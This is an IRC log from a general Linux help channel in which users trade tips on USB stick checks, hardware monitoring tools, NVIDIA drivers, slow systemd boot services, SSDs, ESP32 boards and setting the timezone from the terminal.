03:29 < joepublic> only a very few are only here to score illicit DLLs. 03:29 < nemesys> o/ 03:29 < xamithan> A better question would be what we Don't use it for 03:29 < xamithan> Even driving a car is linux nowadays 03:30 < kazdax> i wanna do something cool with digital electronics 03:30 < joepublic> I use it as my daily workstation and run database and web servers with it. And do some data scraping and crunching. 03:30 < kazdax> first i want to get a job 03:30 < ayecee> it's true. my honda does infinite loops in 5 seconds. 03:30 < kazdax> then i want to make my house a electronic paradise 03:31 < kazdax> i want the latest gadgets ... 03:31 < kazdax> the fastest CPU , the best TV 03:31 < kazdax> but first i need a job 03:32 < kazdax> Red hat certification is what ill focus on 03:32 < kazdax> right now tho ..drinking beer and reading stuff about bash scripting 03:32 < ayecee> if you blow through 5 lines and no one has said anything, you're talking to yourself. 03:32 < xamithan> Do you have sysadmin experience already? Because just redhat cert alone isn't going to help you 03:33 < kazdax> no but how would i get that experince ? 03:33 < joepublic> among hardcore shell scripters, writing scripts that will only work in bash, not in sh or ksh or ash, is considered poor form. 03:33 < ayecee> normally by slaying the previous sysadmin 03:33 < kazdax> i have been daignosed with schizophrenia ..the goverment will help me with my education and to get a job 03:33 < xamithan> Get a support job then move up after you get some experience 03:33 < joepublic> excellent call ayecee 03:33 < xamithan> Or do a contract job for a few months 03:34 < joepublic> now, let's be careful, "contract job" has multiple meanings 03:34 < kazdax> my association that helps disabled people..will help me find the job i want 03:34 < kazdax> they have certain positions in company reserved for people with disablility 03:34 < kazdax> but i can do it the right way too 03:34 < kazdax> and just do contract jobs 03:34 < kazdax> but its easier that way 03:34 < joepublic> build a server out of junk and start being a server admin, is probably the most direct way to get into it. 03:34 < Umeaboy> kazdax: Have you checked the Indeed app? 03:35 < kazdax> no i havnt umeaboy 03:35 < Umeaboy> Please do. 03:36 < joepublic> Today in my sysadmin life I learned the consequences of * not copying all files with cp and rsync, by the way. 03:36 < dogbert2> shelves looked bare at Frys for a gfx card 03:36 < ayecee> goddamn miners 03:36 < joepublic> I found out with sudden horror that * means "anything that does not start with a dot." 03:37 < joepublic> man the graphics card in this machine is an RX 460 which I swore I would never buy when they came out, but was reduced to when all the cards jumped in price or went away 03:37 < kazdax> i know C and assembler x86 03:37 < kazdax> i self taught myself those things 03:37 < kazdax> i am not good at it 03:38 < joepublic> My discovery was just minutes after, ironically, I said "No problem, I have a nice recent backup." 03:38 < kazdax> but i am alright ..i mean if i learnt a lib ..i could write decent apps 03:38 < xamithan> Did you find out how to copy your . files ? 03:38 < joepublic> I know very little C and no x86 assembler. 03:38 < joepublic> yes xamithan, and I am doing it now. 03:38 < kazdax> i leartn x86 assembler in 2 weeks ..spend around 6 hours everyday with a white bioard 03:38 < kazdax> and a book by a dead Indian man 03:39 < kazdax> sivarama was his name 03:39 < joepublic> I can write (k)sh and php with style and grace 03:39 < kazdax> nice ..i want to do bash scripting myself ..be away from use of pointers 03:39 < kazdax> i can do so much better that way 03:39 < kazdax> pointers is way to complex for me 03:40 < joepublic> shell scripting is not only away from pointer use, it is away from universes where the existence of pointers is known... 03:40 < kazdax> yea ..pointers scare me 03:41 < kazdax> i rather do bash or python 03:41 < joepublic> I am not saying you should learn the language "rust", but I heard it was written by people who don't want to deal with pointers, for people who don't want to deal with pointers. 03:41 < kazdax> perl is another scary looking beast but i enjoyed alittle i learnt about it 03:41 < jimm> get a book called "the c companion" 03:42 < jimm> its a companion text for while you're learning c from a c primer 03:42 < Disconsented> rust might not have pointers but you have to deal with lifetimes 03:42 < Disconsented> which can be hell at times 03:42 < joepublic> I learned c from a c primer in something like 1991. I didn't like it and it didn't stick. I don't think that is where I am destined to spend my admin time. 03:43 < kazdax> cool ..i tried going back to the K&R book but i just cant do it anymore .. Maybe as i get my life straighten out alittel .. dos omething easier like System admin .. i might get back into it 03:43 < io_elephant> if i make a copy of a 100 gig file and put it on usd stick, then sh256 -b both source and cope, they should be same correct? 03:43 < joepublic> io_elephant, yes, if the usb stick is not counterfeit. 03:43 < joepublic> or just diff them; diff tells you yes or no 03:44 < joepublic> I spend a lot of time doing "something easier like system admin". 03:44 < joepublic> which users, alas, often confuse with "webmaster" or "clerk" 03:44 < kazdax> i mean system admin might not be that easy ..but i bet its hell lot of fun writting code you dont have interest in writting 03:44 < joepublic> "Can you scan this and put it on our website real quick?" "No. Next, please." 03:45 < joepublic> I find administering systems to be much much easier than programming in languages where you have to manage your own memory. 03:45 < kazdax> yea 03:45 < kazdax> malloc and stuff like that 03:45 < kazdax> heap allocation 03:46 < kazdax> never quite got the hang ofit 03:46 < io_elephant> What is the quick and sure to figure out if a USB stick is defective? 03:46 < kazdax> i read it but still a mystery lol 03:46 < io_elephant> badblocks didnt show anything 03:46 < joepublic> io_elephant, i'd say you are pretty far along that path right now 03:46 < kazdax> io once when i was in nigeria 03:46 < joepublic> there is a program I heard about that reads the hardware info, but I don't know its name or any more about it 03:46 < kazdax> i bought a usb stick ..that would replicate chinese character text files on my system 03:47 < xoxxxx> inxs? 03:47 < kazdax> that is a sure way to know its messed up 03:47 < joepublic> I bought a 4gb USB stick from the ancient oriental city of shenzhen recently; i figured who would go to the trouble of making a counterfeit 4gb usb stick. 03:47 < joepublic> the answer turned out to be "the men and women of shenzhen" 03:48 < io_elephant> I got a USB stick, copied a VBox image + HD on it, tried to start it but i got gazzilion of errors. Then i created a branch new VBox image + HD on the USB stick and it worked fine. Ran badblocks didnt show anything. Ran SHA256 -b of HD copy on USB and outside and they are different. 03:48 < io_elephant> "branch" should be "brand" 03:49 < joepublic> perhaps there is something inexplicable happening, or perhaps it does not show errors "yet" because the VDI has not grown enough 03:49 < io_elephant> The SHA256 i ran for the HD which i copied onto the USB, not the brand new one i created 03:49 < io_elephant> joepublic: thats what i was thinking too. The HD I copied was 100Gig, and the simple new test HD i created was like 20 03:50 < kazdax> so if i do LFS i can be sure that my system isnt compromized right ? 03:50 < joepublic> kazdax, no, I would not say that. 03:51 < paddy|> forget about lfs cause you will be copy and pasting for hours and thats it 03:51 < kazdax> what if the linux is very mininmal 03:51 < kazdax> and all you install is what you really really need 03:51 < paddy|> install debian base and go package by package from there 03:51 < joepublic> then it will be only as good as the tools put put into it, which depends on your bootstrap system not being compromised, something that lfs cannot guarantee. 03:51 < jimm> for lfs you'd need an existing system first to compile the initial stuff 03:52 < io_elephant> kazdax: afaik, if you create LFS, you have to keep up with updates to different tools manually. 03:52 < joepublic> io_elephant, nah, you could script that. other people did, and made distros out of the result. 03:52 < kazdax> so what do i do to have a good secure system 03:52 < paddy|> disconnect 03:53 < joepublic> somehow I am interpolating the phrase "without an air gap" 03:53 < kazdax> right its book and pen 03:53 < joepublic> and even the air gap is not guaranteed. at a russian nuclear research lab this past year, some of the researchers connected airgapped supercomputers to the public internet in the interest of mining cryptocurrency. 03:54 < paddy|> where did you pull that story from? 03:54 < joepublic> russia today 03:55 < joepublic> there is a url if you want to evaluate the trustworthiness of the source (by no means guaranteed accurate) 03:56 < triceratux> https://www.rt.com/news/418339-russia-nuclear-supercomputer-mining/ 03:59 < dannylee> this is the END 03:59 < joepublic> so the functions will come afterwards. 03:59 < dannylee> the Doors 04:00 < joepublic> The_Machine, я машина? 04:01 < The_Machine> Probably not, considering I don't know what that means. 04:02 < The_Machine> Unless you were asking, "do you not know what this means?" in which the answer would be "Absolutely!" 04:02 < joepublic> oh. there is a funny comedy bit called "I am the machine" about a guy on a field trip to russia. that means "I am the machine" 04:02 < The_Machine> yeah, everyone asks me about it all of the time. 04:02 < The_Machine> I've seen it. 04:02 < The_Machine> My nickname is much older than the bit. 04:03 < joepublic> oh. well, that's what he said to the probably ficticious russian gangsters. 04:03 < The_Machine> gotcha 04:04 < joepublic> my russian sucks very badly but just enough for me to catch a word or two and feel completely lost. 04:06 < The_Machine> I feel that way about linux. 04:07 < joepublic> That's pretty natural. 04:08 < The_Machine> There really needs to be a matrix style "upload knowledge to your head" that isn't so tedious as reading/learning 04:08 < The_Machine> Although, that might be catastrophic for humanity 04:08 < joepublic> the "magic secret to learning" is, unfortunately, repetition and practice. 04:08 < The_Machine> So how about just for me? I am The_Machine after all. 04:08 < The_Machine> yeah. aint nobody got time fo dat. 04:09 < joepublic> heh say it without the sarcasm and you have identified the problem 04:10 < The_Machine> that, and reproductive urges. it's like, no contest. 04:10 < The_Machine> idiocracy is a documentary. 04:10 < joepublic> A record playing all night. "ls. ls. ls dash a. ls dash a. ls dash a pipe less. ls dash a pipe less" 04:10 < joepublic> idiocracy is in fact a documentary. 04:11 < triceratux> ftw https://jeremy.bicha.net/2018/04/18/gksu-removed-from-ubuntu/ 04:11 < joepublic> yeah i heard they replaced it with a telemetry module 04:12 < snugger> what is the terminal emulator of your choice? 04:13 < joepublic> I use gnome terminal, with a nice color and font scheme profile for each host to help reduce the typing of things in the wrong window. 04:13 < joepublic> excuse me, I use the fork called "mate terminal" 04:14 < triceratux> gksu is always so poorly configured i have to summarily symlink it (along with pkexec) to sudo itself. all better 04:24 < stevendale> Hey 04:24 < The_Machine> chips ahoy 04:33 < D-rex> should I have 2 diffreent flash plugins loading with chromium? 04:33 < D-rex> https://ibb.co/j8ZWcS 04:33 < D-rex> it shows a ppapi and pepperflash 04:33 < D-rex> or are they the same thing? 05:10 < paddy|> okay 05:13 < chamar> hi folks, I got a new laptop and I want to monitor the cpu clock / temp / voltage ... what's the best tool under linux to do so? (something similar to hwinfo on Windows..) 05:14 < matsaman> like constantly monitor? 05:15 < chamar> matsaman: yeah.. I could be a command line tool ... I want to see how to behave under load for let's say 10 mins 05:15 < matsaman> oh, I would just query /proc or /sys or whatever directly in that case 05:16 < chamar> yeah.. I could... but I like little visual tools ;) 05:17 < matsaman> okay sounded like you wanted the opposite there 05:18 < matsaman> https://alternativeto.net/software/gkrellm/ 05:18 < matsaman> that should have little GUI widget thingos 05:19 < chamar> matsaman: well. it could be a command line ncurse based tool.. Thanks for the links, having a look 05:22 < cmj> gkrellm is great 05:22 < chamar> Looks old school, but so I am. all good 05:23 < cmj> https://i.imgur.com/jNi8C5Y.png 05:25 < chamar> cool.. I will give it a shot. hopefully it can give me the cpu freq 05:25 < pantato> does anyone know if there is linux support for the epson stylus nx515 printer at all? 05:26 < marktr> https://ubuntuforums.org/showthread.php?t=1365891 05:26 < marktr> :ppls ;ole? 05:26 < marktr> Looks like* 05:26 < cmj> chamar: there is another tool that might have a bit more fluff 05:27 < cmj> conky i think 05:27 < chamar> cmj: ok.. I'll have a look too.. gathering some info on windows first, and I'll compare with Linux after.. 05:29 < cmj> i have used gkrellm for 20 years, but conky is new and squishy https://en.wikipedia.org/wiki/Conky_(software) 05:30 < pantato> marktr: looks like the site linked there doesn't have those drivers available anymore? 05:30 < pantato> either that or google translate is killing the links 05:31 < litewq> any good resources to learn about virtual file system? 05:33 < marktr> pantato: Give it a shot and find out, I don't have one on hand to test but it should be supported. 05:33 < marktr> I have minimal complaints with CUPS 05:33 < CrazyTux> hello, do I need to install NVidia driver for this laptop? https://www.asus.com/Laptops/X540LA/ 05:36 < marktr> CrazyTux: https://wiki.archlinux.org/index.php/NVIDIA_Optimus 05:36 < CrazyTux> marktr, thanks 05:36 < marktr> The answer is "maybe sorta depending on what you want?" 05:37 < twainwek> did nvidia ever actually started fully support optimus cards? 05:38 < twainwek> supporting* 05:39 < CrazyTux> details of my laptop 05:39 < CrazyTux> Graphics: Card-1: Intel HD Graphics 5500 driver: i915 v: kernel 05:39 < CrazyTux> Display: x11 server: X.Org 1.19.2 driver: modesetting unloaded: fbdev,vesa 05:39 < CrazyTux> resolution: 1366x768~60Hz 05:39 < CrazyTux> OpenGL: renderer: Mesa DRI Intel HD Graphics 5500 (Broadwell GT2) v: 4.5 Mesa 13.0.6 05:39 < CrazyTux> Audio: Card-1: Intel Broadwell-U Audio driver: snd_hda_intel 05:39 < CrazyTux> Card-2: Intel Wildcat Point-LP High Definition Audio driver: snd_hda_intel 05:39 < CrazyTux> Sound Server: ALSA v: k4.13.0-1-amd64 05:40 < CrazyTux> do I need to install NVidia driver? 05:47 < ayecee> please use a pastebin in the future 05:47 * alexey-nemovff thinks the same.. 05:48 < rafal_m> Hi guys. I've never used IRC before and just wanted to try it out. Having this opportunity I would like to wish a good day to you all. 05:49 < CrazyTux> ayecee, ok 05:49 < alexey-nemovff> welcome rafal_m .. I'm pretty new too 05:49 < alexey-nemovff> ~3 weeks now using IRC.. 05:52 < rafal_m> Might be a stupid question and probably depends on the IRC client but whats the difference between a regular text appearing here and a green text? (looks like a private message, if so, how do you send it?) 05:53 * alexey-nemovff is wondering if rafal_m is referring to this kind of messages.. 05:53 < ayecee> rafal_m: not sure what you mean. screenshot it? 05:53 < rafal_m> alexey 05:53 < rafal_m> that's right! 05:53 < twainwek> CrazyTux: as the other guy said depends on what you're trying to do 05:53 < alexey-nemovff> =D 05:53 < rafal_m> @alexey-nemovff That's right! 05:54 < rafal_m> But how do you do these things? 05:54 < alexey-nemovff> what client are you using rafal_m ? 05:54 < rafal_m> hexchat 05:55 < CrazyTux> twainwek, ok 05:55 < twainwek> CrazyTux: if you want to have a functioning desktop, almost certainly no. if you want to have full functionality of the graphics card, most likely yes 05:57 < chamar> hha! nice https://github.com/amanusk/s-tui 05:58 < CrazyTux> what could be the reason for random freezing on some distros? 05:59 < ayecee> aliens 05:59 < ayecee> usually aliens 05:59 < CrazyTux> lol 05:59 < rafal_m> :) 05:59 < stevendale> o/ 05:59 < stevendale> Not running Windows could also be the problem CrazyTux 05:59 < stevendale> Lol 06:00 < CrazyTux> but, seriously. Only some distros seem to have that problem. 06:00 < stevendale> I actually had my first ever XP BSOD on this laptop this morning :) 06:00 < tabsterleir> Speaking of Windows, Microsoft are making their own Linux for IoT. What timeline is this?! 06:00 < stevendale> xD 06:01 < alexey-nemovff> rafal_m: they are called actions.. 06:02 < alexey-nemovff> rafal_m: Should work with '/me something something' 06:02 * rafal_m understands the actions now 06:03 < alexey-nemovff> cool 06:05 < topicali> is it 'normal for it to take 2+ minutes for systemd-udev-settle.service to start? 06:05 < ayecee> probably no 06:05 < rafal_m> alexey-nemovff 06:05 < rafal_m> alexey-nemovff: Hey 06:06 < alexey-nemovff> you got it 06:06 < alexey-nemovff> topicali: systemd isn't normal at all 06:06 < topicali> i think my hosting provider is either BS'ing me, and/or trying to sell me their "managed hosting" 06:08 < topicali> when i asked, this was there response: https://pastebin.ca/4016759 06:08 < topicali> their* 06:09 < ayecee> neat 06:09 < zhangxaochen> 'apt install' says a lib is already installed, while it cannot find the lib file it needs, why is this happening? http://codepad.org/8WV5QYWd 06:09 < tvm> topicali: that is definitely not normal 06:09 < ayecee> zhangxaochen: missing dev package usually. 06:09 < ayecee> ah, wait. 06:10 < ayecee> zhangxaochen: you didn't stat the same name as returned from apt-file 06:10 < ayecee> zhangxaochen: where are you getting that name from 06:11 < tvm> that lib looks like to be in -dev package 06:11 < tvm> but you installed only libvtk-6.2 06:11 < zhangxaochen> oh my mistake, lemme try again 06:11 < topicali> tvm: it's on centos (for whatever relevance that's worth), but i've never had a system hang on any process for that much time on boot 06:12 < zhangxaochen> ayecee, tvm, I try to install -dev package, always resulting 404: http://codepad.org/UO6qhP5I 06:13 < topicali> i'm not cynical, but it certainly sounds, from their response, that they're either incompetent and/or trying to sell something (i pay ~$1400/yr for this dedicated server) 06:13 < ayecee> zhangxaochen: apt update first 06:13 < tvm> ^^ 06:14 < ayecee> topicali: no hosting drama please 06:14 < Sonolin> topicali linode runs gentoo and ~$5 a month 06:14 < tvm> topicali: is it VM or physical server ? 06:14 < Sonolin> no systemd = win win 06:14 < topicali> tvm: physical 06:15 < tvm> topicali: did they do the setup ? was it doing this since beginning ? 06:15 < topicali> tvm: yes; i've never personally seen the server, but took their word for it 06:15 * Psi-Jack pets his systemd. 06:15 < topicali> better question: what would cause that process to take that long to start? 06:16 < ayecee> that's not really a good question 06:16 < ayecee> it normally doesn't do that 06:16 < ayecee> and you have all the evidence of why it's doing it in your case 06:16 < topicali> i said better, not good 06:17 < ayecee> so? 06:17 < ayecee> was that intended to correct me? 06:19 < tvm> well, you can either go deep and find the issue, or add some timeout to systemd unit 06:19 < tvm> or not restart your 'server' every day 06:20 < topicali> tvm: i don't regularly reboot it..my concern is if i should be concerned 06:20 < tvm> i wouldn't be 06:20 < topicali> want to make sure my server is 'healthy' 06:20 < topicali> k 06:21 < tvm> some distros will hang for three minutes by default, if they can't get DHCP response 06:23 < topicali> i mean the boottime itself isn't an annoyance or problem (i'm patient), but my concern is that the extended boot time may be indicative of a larger/impending issue 06:26 < ayecee> it's unusual, but not a cause for panic 06:26 < ayecee> it's one of those things to check out sometime when you have nothing else to do 06:27 < tvm> i think it might be some minor incompatbility/bug between the hw and kernel/CentOS 06:27 < NextContestant> test 06:28 < ayecee> may be pretty benign - a piece of hardware takes a long time to initialize. not uncommon for server gear. 06:28 < NextContestant> with wget, using -m for mirroring, is there any way to stop (say for reboot) and to have it continued? Man only states continue are for a file usage 06:29 < topicali> it runs great when it's online..my job is to be paranoid about downtime 06:29 < tvm> topicali: you could actually use udevadm trigger -v to see if it will show you where it hangs 06:29 < ayecee> that's good to be concerned about before it's a problem 06:29 < ayecee> ooh, nice 06:32 < topicali> i certainly don't envy the job of the CIO at my company 06:32 < ayecee> how so? 06:32 < topicali> CSO* 06:33 < ayecee> designated scapegoat 06:33 < topicali> haha 06:33 < topicali> an extreme amount of accountability 06:33 < ayecee> "why do you guys keep calling me DS? i don't know what that means!" 06:34 < topicali> i don't think i would ever sleep at night 06:34 < ayecee> the trick is to not think about it too much 06:35 < ayecee> most of the time it's okay 06:35 < ayecee> some of the time you can can talk your way out of it too 06:36 < topicali> idk if it's more intense earlier or now in terms of cyber warfare/hacking 06:37 < topicali> always feel like if someone has a will to hack something, they'll find a way 06:37 < jimm> for what target? 06:38 < topicali> any target 06:38 < ayecee> the terrorists have won 06:39 < jimm> oh... which one was more intense earlier? 06:39 < Triffid_Hunter> topicali: sounds extreme to me.. my openrc system goes from cold to desktop in 10 seconds flat 06:39 < topicali> oh..i meant more of an issue in the 90's/2000's versus now 06:40 < topicali> as well as the stakes..everything is online now 06:40 < Dagmar> Triffid_Hunter: Nice work. I've considered trimming up Slackware like that, but it's not like I ever reboot 06:40 < jimm> maybe some of those hacks have mellowed out, and probably became more social 06:41 < tvm> my windows 7 boot in 10 seconds with SSD from cold to desktop 06:41 < Dagmar> tvm: And how long does it take to stop grinding background tasks and let you actually use it 06:41 < tvm> debian with ssd to i3 ? like six 06:41 < topicali> Triffid_Hunter: that's what i'm more used to, hence my concern =/ 06:41 < jimm> .lskeys 06:41 < jimm> shoot 06:41 < Triffid_Hunter> Dagmar: heh well I used to never reboot because it took too long, now it takes longer to open firefox than to reboot so I can at least stay relatively up to date wrt kernel and graphics drivers 06:41 < jimm> I know how I can do it 06:41 < strive> tvm: That's FAST. 06:41 < Psi-Jack> But, I haven't taken aim yet, jimm! ; 06:41 < Psi-Jack> :) 06:42 < tvm> strive: you mean windows ? 06:42 < topicali> my rpi3 boots in ~10 secs 06:42 < Triffid_Hunter> tvm: I got win7 in a VM that boots that fast too, he 06:42 < strive> tvm: Ya. 06:42 < jimm> heh,,, now now :P 06:42 < tvm> i think it's the i7/SSD combination that makes it fast 06:43 < jimm> what kind of ssd is it? 06:43 < Dagmar> Also I suspect you don't have Chrome or Steam or a number of other notification window things installed 06:43 < tvm> just some generic kingston 06:43 < tvm> let me actually measure the time 06:43 < Dagmar> I'm not sayin' Win10 is unnaturally slow, but they certainly bring the desktop up long before the thing is actually ready to be used 06:43 < topicali> but overall, boottime isn't as much of a concern vs. stability/security/performance 06:44 < tvm> ok, it's actually 15s 06:44 < Dagmar> jimm: An SSD is actually a major improvement even if it's a cheap on 06:44 < Dagmar> e 06:44 < Triffid_Hunter> https://imgur.com/a/ywwIF is my system if anyone's interested.. lovely performance, fits in a shopping bag or backpack with room to spare 06:44 < Dagmar> Random access on spinny-disks burns quite a lot of time, actually 06:45 < jimm> tvm, oh... is it in a pcie slot? or connected by sata? 06:45 < tvm> jimm: just normal SATA 06:45 < Dagmar> Even netbooks booting off internal sdcard media boot up really fast 06:45 < tvm> however, it's not 10s, it's 15s 06:45 < topicali> ssd rocks..i used to do wedding photography, and an assistant dropped a hdd..took $1200 for a lab to recover the data 06:45 < Psi-Jack> Wait, RPI3 with SATA? 06:45 < tvm> but feels still like fastest thing that i've ever had 06:46 < Dagmar> topicali: Sweet crap that's one heck of a use case for external ssds 06:46 < jimm> I think he said he has an i7 :P 06:46 < Triffid_Hunter> Jimm: mine's an NVMe.. basically PCIe x4 in the M.2 slot 06:46 < topicali> Dagmar: this was ~10 yrs ago..def all SSD now! 06:46 < Triffid_Hunter> ironically, sata itself is the bottleneck these days rather than the speed of the underlying storage 06:46 < tvm> how can one live without SSD after trying it ? 06:47 < jimm> those should be among the fastest 06:47 < topicali> besides the speed, ssd is safer 06:47 < topicali> no moving parts 06:47 < tvm> it's always about backups 06:47 < topicali> tvm: that's for sure 06:47 < Sonolin> eh I'm indifferent to SSDs, doesn't really make a huge difference IMO 06:47 < jimm> yep, pretty much, backup or die 06:48 < Sonolin> I mean yea, boots up faster, but really its not a huge deal 06:48 < topicali> data loss is a nightmare 06:48 < Psi-Jack> tvm: Did you say you have an RPi3 with SATA (and thus SSD?) 06:48 < tvm> i like my average Jetbrains IDE to boot from SSD instead of normal drive 06:48 < tvm> Psi-Jack: nope, it's regular Dell box 06:48 < Psi-Jack> Ahh okay, 06:49 < tvm> is that even possible to hack SATA on RPi3 ? 06:49 < Sonolin> if you're running Jetbrains its going to be slow no matter where it runs ;) 06:49 < Psi-Jack> tvm: It might be. heh 06:49 < tvm> Sonolin: it boots in <5s with SSD 06:49 < tvm> that is reasonably fast for me 06:49 < Sonolin> In my experience with JetBrains, the boot time is not the main factor 06:49 < Psi-Jack> https://www.amazon.com/Raspberry-Expansion-Geekworm-Storage-interface/dp/B073CGQD9C 06:50 < Psi-Jack> Apparently so, with the RPi3 B+ 06:50 < topicali> 'cloud' backups is also key 06:50 < Sonolin> memory & indexing are two other concerns that seem to take forever no matter the device 06:50 < topicali> storage is so cheap these days 06:50 < tvm> oh, that actually reminds me that i should get some Rpi3 B+'s from my CTO today 06:50 < Sonolin> but I digress, a little salty tonight 06:51 < tvm> Sonolin: yeah, those take usually some time, but i'm not bothered with it 06:52 < topicali> rpi is the coolest 'project' i've seen..especially for younger folks 06:52 < topicali> super inexpensive 06:52 < tvm> it's cool, unless you develop commercial software for that device and try to sell it in thousands, which i unforunately do 06:52 < Psi-Jack> topicali: Check out the ESP-32 microcontrollers. :) 06:53 < Sonolin> tvm yea definitely my choice in IDEs, although I never seem to load it up more than once or twice a week 06:53 < Sonolin> mostly for debugger, when VDebug just deosn't cut it 06:53 < Sonolin> *doesn't 06:54 < topicali> Psi-Jack: never messed around with that one, but SoC devices rock 06:54 < topicali> at least for sandboxing/prototyping/learning 06:54 < Psi-Jack> ESP-32 isn't a SoC, but a microcontroller. 06:54 < topicali> oh, thought it was a SoC 06:54 < tvm> in fact, i should receive like 10 various SoCs today as we aren't still sure what to use for this project 06:55 < tvm> and some previous SoCs turned out to be problematic as always 06:56 < Psi-Jack> topicali: Heh, Using the Arduino IDE and Platform I/O, I designed a series of ESP-32 based control units in my house to handle automation and security. A VM being the primary central control, replicated to a RPi3 that's hidden elsewhere. :) 06:56 < tvm> it kinda sucks when you discover badly reproducible hardware/driver bug late in your project that makes whole platform useless 06:56 < Sonolin> g'night all 06:56 < topicali> ah i remember getting my pic12f629 programmer to make ps1 modchips for my friends 06:56 < topicali> sweet nostalgia 06:56 < stevendale> Hey 06:57 < topicali> Psi-Jack: what's price does it go for? 06:57 < Psi-Jack> topicali: Hmmm, About $5. :) 06:58 < topicali> damn! 06:59 < topicali> ^pic12c508^ 06:59 < topicali> Psi-Jack: and that's on amazon? 06:59 < Psi-Jack> Yep. Got an ESP32 on my garage door opener, in my bathrooms controlling humidity sensors for the exhaust vents, door sensors, security control panels in the house, light switches, and more. :) 06:59 < Psi-Jack> topicali: No, Aliexpress, direct from China. 07:00 < topicali> never used aliexpress..it's pretty legit? 07:00 * luke-jr tries Linux 4.16 with DRM/Radeon from 4.15 :/ 07:01 < Psi-Jack> topicali: Use the heck outta them. Takes a few days, but they've got a great rep, and Aliexpress will refund you if the shipper is fraud. 07:01 < topicali> i'm just looking at its wiki page https://en.wikipedia.org/wiki/ESP32 07:02 < topicali> looks like a great bang for the buck 07:02 < Psi-Jack> topicali: The ESP8266 is similar, previous model, still reliable, is also pretty good, got a couple of those too. :) 07:02 < tvm> Psi-Jack: that looks pretty badass 07:02 < Psi-Jack> :) 07:03 < Psi-Jack> Yeah, pretty solid stuff. Pretty much gave me the first time reason to really learn C++ 07:03 < Psi-Jack> Though you can use JavaScript or LUA as well, depending on what firmware you use (with the ESP8266 anyway) 07:03 < tvm> or micropython :D 07:03 < Psi-Jack> Yes, micropython. :) 07:04 < topicali> ah just realized i bought some knock-off nfl jerseys from aliexpress in the past 07:04 < Psi-Jack> The biggest issue I have really is the TLS support is currently limited. 07:04 < stevendale> Writing a 60 GB VMDK file to HDD 07:04 < Psi-Jack> TLS 1.0 is still "common" but higher is ... WIP. 07:04 < topicali> i'm gonna order some of those microcontrollers...there's a lot of fun stuff on that board 07:05 < Psi-Jack> topicali: I' 07:05 < Psi-Jack> topicali: I've bought several models of various vendors, if you want thoughts. 07:05 < Johnjay> oh weird i thought i was in #esp8266 07:05 < Psi-Jack> LOL 07:05 < Johnjay> i'm actually ordering a dev board with that soon from aliexpress 07:05 < topicali> Psi-Jack: which/what would u suggest? 07:06 < Psi-Jack> topicali: So far, in the ESP32's, I've only gotten LoLin32 models, which aren't that great, dev model, but they do what I wanted. For ESP8266, small purposes, WeMoS is excellent. 07:06 < jimm> please expand the u... 07:07 < Psi-Jack> That or any NodeMCU (you can reflash with any firmware) 07:07 < Johnjay> what's special about the lolin32? 07:07 < Johnjay> https://hackaday.com/tag/lolin32/ 07:08 < Psi-Jack> Johnjay: Nothing, really. I was an early adopter of the ESP32, and Lolin32 was one of the first out. :) 07:08 < stevendale> What's sad? My Intel GMA 4500 MHD outperforms my NVIDIA GeForce 8400 GS 256 MB 07:09 < jimm> topicali, has someone explained the deal behind u and this channel? 07:10 < topicali> jimm: 'deal'? 07:11 < Johnjay> very strange, this article is talking about radio reception thousands of miles away with just some batteries? 07:11 < Johnjay> https://hackaday.com/2016/03/08/how-low-can-you-go-the-world-of-qrp-operation/ 07:12 < stevendale> If we didn't have world wars going on the whole time and weren't stuffing around in religion and politics, and we allocated every available resource to science and technology, we wouldn't just have colonized mars, we would be building platforms with artifial gravity and self-producing oxygen, designed to float inside the outer atmosphere Jupiter and Saturn, and harvest the gaseous material, 07:12 < stevendale> and then ship it in shuttles back to Mars 07:12 < jimm> yeah... basically we don't want to permit those kinds of abbreviations, mostly because they don't work the same way with every human language... some nonenglish speakers dont know that u rhymes with you 07:12 < jimm> I just wanted to make sure you understood why 07:14 < jimm> anyway I'm out for a bit 07:14 < topicali> jimm: ?? 07:14 < Psi-Jack> topicali: In short, don't use "u", instead use "you". :) 07:15 < topicali> ahhh 07:15 < topicali> gotcha :) 07:15 < topicali> understood 07:15 < stevendale> Can I have fries with that Psi-Jack o/ 07:16 < topicali> very used to typing in 'shorthand' 07:16 < topicali> will refrain 07:16 < Psi-Jack> Much appreciated. Personally, I absolutely hate shtspk (aka sms-speak, aka shorthand). 07:17 < topicali> sms-speak is a very good way of putting it 07:17 < Sveta> my horse riding coach used 200% font size in sms and they were still complete sentences 07:17 < tvm> Psi-Jack: same here, but it was declining lately it seems 07:18 < tvm> ~15-20 years ago, people would use 'u' and the like more often 07:18 < tvm> at least on IRC 07:19 < topicali> i certainly appreciate the fact that some folks aren't native english speakers 07:19 < topicali> and will respect that 07:26 < p3rL> how do i change the timezone by terminal 07:27 < topicali> p3rL: depending on the distro, edit /etc/sysconfig/clock 07:27 < topicali> or /etc/localtime 07:28 < stevendale> Brb 07:28 < blaztek> p3rL: or the TZ variable....if you don't want it system wide 07:29 < luke-jr> /etc/timezone on Gentoo 07:29 < p3rL> is this correct >> cp /usr/share/zoneinfo/Asia/Qatar /etc/localtime 07:30 < Dagmar> Probably 07:30 < p3rL> cool 07:30 < p3rL> done 07:30 < p3rL> tyx 07:30 < luke-jr> your OS might overwrite it if you do it that way, though 07:30 < topicali> p3rL: if that's your timezone, and /etc/localtime is where your distribution exists, then yes 07:31 < topicali> rather, where your distribution's timezone information exists 07:31 < john_rambo> I am trying to configure my Gmail (pop3) a/c with Claws-Mail ...Its ending with >>>Authentication failed:-ERR [AUTH] Web login required: https://support.google.com/mail/answer/78754 07:31 < p3rL> actually i need to change the ircd log time its shows vps current time not my country 07:31 < p3rL> so i change it to... my country time log 07:32 < topicali> p3rL: what distribution/flavor of linux are you using? e.g. debian, fedora, gentoo, centos, ubunto, etc. 07:32 < p3rL> uubuntu 07:33 < Dagmar> When in doubt there's always the tzselect script 07:33 < topicali> p3rL: https://help.ubuntu.com/community/UbuntuTime 07:33 < topicali> or from the command line: sudo dpkg-reconfigure tzdata 07:34 < p3rL> now its chanaged when i copy /etc/localtime 07:34 < p3rL> ~$ date 07:34 < p3rL> Thu Apr 19 10:33:52 PKT 2018 07:34 < Dagmar> Well, yes. 07:34 < p3rL> but the log file still same xD 07:34 < topicali> p3rL: in ubuntu (according to the documentation), the timezone information is stored in /etc/timezone 07:35 < p3rL> letme try to restart 07:35 < Dagmar> What, the syslog? 07:35 < p3rL> no proxy logs 07:35 < Dagmar> Hrm... Poke the service and restart it 07:36 < p3rL> still .. 07:36 < p3rL> 2018-04-19 07:36 +02:00: 07:36 < p3rL> i wanna change this time xD 07:36 < Dagmar> The proxy probably has it's own setting stashed away somewhere 07:36 < Penguin> Dagmar: 